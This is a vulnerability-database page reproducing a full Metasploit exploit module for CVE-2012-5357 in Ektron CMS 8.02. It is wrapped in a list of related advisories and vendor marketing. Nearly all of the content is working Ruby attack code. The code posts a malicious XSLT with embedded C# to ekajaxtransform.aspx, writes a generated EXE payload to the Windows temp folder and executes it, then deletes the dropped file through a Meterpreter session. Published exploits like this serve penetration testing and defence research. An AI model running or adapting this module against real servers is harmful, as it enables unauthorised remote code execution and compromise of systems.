Lucene search
K

Ektron 8.02 XSLT Transform Remote Code Execution

🗓️ 05 Dec 2012 00:00:00Reported by unknownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Ektron CMS 8.02 XSLT Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Ektron 8.02 XSLT Transform Remote Code Execution
5 Dec 201200:00
zdt
Circl
CVE-2012-5357
5 Dec 201200:00
circl
Check Point Advisories
Ektron XSLT Transform Remote Code Execution (CVE-2012-5357)
21 Jul 201300:00
checkpoint_advisories
CVE
CVE-2012-5357
30 Oct 201714:00
cve
CVE
CVE-2012-5358
30 Oct 201714:00
cve
Cvelist
CVE-2012-5357
30 Oct 201714:00
cvelist
Cvelist
CVE-2012-5358
30 Oct 201714:00
cvelist
Exploit DB
Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)
5 Dec 201200:00
exploitdb
Tenable Nessus
Ektron CMS XslCompiledTransform Class Request Parsing Remote Code Execution
12 Dec 201200:00
nessus
EUVD
EUVD-2012-5279
7 Oct 202500:30
euvd
Rows per page
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'msf/core/exploit/file_dropper'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',  
'Description' => %q{  
This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The  
vulnerability exists due to the insecure usage of XslCompiledTransform, using a  
XSLT controlled by the user. The module has been tested successfully on Ektron CMS  
8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK  
SERVICE privileges.  
},  
'Author' => [  
'Unknown', # Vulnerability discovery, maybe Richard Lundeen from http://webstersprodigy.net/ ?  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2012-5357'],  
[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],  
[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500  
},  
'Platform' => 'win',  
'Privileged' => true,  
'Targets' =>  
[  
['Windows 2003 SP2 / Ektron CMS400 8.02', { }],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Oct 16 2012'  
))  
  
register_options(  
[  
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),  
OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])  
], self.class )  
end  
  
def check  
  
fingerprint = rand_text_alpha(5 + rand(5))  
xslt_data = <<-XSLT  
<?xml version='1.0'?>  
<xsl:stylesheet version="1.0"  
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
xmlns:msxsl="urn:schemas-microsoft-com:xslt"  
xmlns:user="http://mycompany.com/mynamespace">  
<msxsl:script language="C#" implements-prefix="user">  
<![CDATA[  
public string xml()  
{  
return "#{fingerprint}";  
}  
]]>  
</msxsl:script>  
<xsl:template match="/">  
<xsl:value-of select="user:xml()"/>  
</xsl:template>  
</xsl:stylesheet>  
XSLT  
  
res = send_request_cgi(  
{  
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",  
'headers' => {  
"Referer" => build_referer  
},  
'vars_post' => {  
"xml" => rand_text_alpha(5 + rand(5)),  
"xslt" => xslt_data  
}  
})  
  
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
  
def on_new_session(session)  
if session.type == "meterpreter"  
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")  
end  
  
@dropped_files.delete_if do |file|  
win_file = file.gsub("/", "\\\\")  
if session.type == "meterpreter"  
begin  
windir = session.fs.file.expand_path("%WINDIR%")  
win_file = "#{windir}\\Temp\\#{win_file}"  
# Meterpreter should do this automatically as part of  
# fs.file.rm(). Until that has been implemented, remove the  
# read-only flag with a command.  
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)  
session.fs.file.rm(win_file)  
print_good("Deleted #{file}")  
true  
rescue ::Rex::Post::Meterpreter::RequestError  
print_error("Failed to delete #{win_file}")  
false  
end  
  
end  
end  
  
end  
  
def uri_path  
uri_path = target_uri.path  
uri_path << "/" if uri_path[-1, 1] != "/"  
uri_path  
end  
  
def build_referer  
if datastore['SSL']  
schema = "https://"  
else  
schema = "http://"  
end  
  
referer = schema  
referer << rhost  
referer << ":#{rport}"  
referer << uri_path  
referer  
end  
  
def exploit  
  
print_status("Generating the EXE Payload and the XSLT...")  
exe_data = generate_payload_exe  
exe_string = Rex::Text.to_hex(exe_data)  
exename = rand_text_alpha(5 + rand(5))  
fingerprint = rand_text_alpha(5 + rand(5))  
xslt_data = <<-XSLT  
<?xml version='1.0'?>  
<xsl:stylesheet version="1.0"  
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
xmlns:msxsl="urn:schemas-microsoft-com:xslt"  
xmlns:user="http://mycompany.com/mynamespace">  
<msxsl:script language="C#" implements-prefix="user">  
<![CDATA[  
public string xml()  
{  
char[] charData = "#{exe_string}".ToCharArray();  
string fileName = @"C:\\windows\\temp\\#{exename}.txt";  
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);  
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);  
for (int i = 0; i < charData.Length; i++)  
{  
bw.Write( (byte) charData[i]);  
}  
bw.Close();  
fs.Close();  
System.Diagnostics.Process p = new System.Diagnostics.Process();  
p.StartInfo.UseShellExecute = false;  
p.StartInfo.RedirectStandardOutput = true;  
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";  
p.Start();  
return "#{fingerprint}";  
}  
]]>  
</msxsl:script>  
<xsl:template match="/">  
<xsl:value-of select="user:xml()"/>  
</xsl:template>  
</xsl:stylesheet>  
XSLT  
  
print_status("Trying to run the xslt transformation...")  
res = send_request_cgi(  
{  
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",  
'headers' => {  
"Referer" => build_referer  
},  
'vars_post' => {  
"xml" => rand_text_alpha(5 + rand(5)),  
"xslt" => xslt_data  
}  
})  
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/  
print_good("Exploitation was successful")  
register_file_for_cleanup("#{exename}.txt")  
else  
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")  
end  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation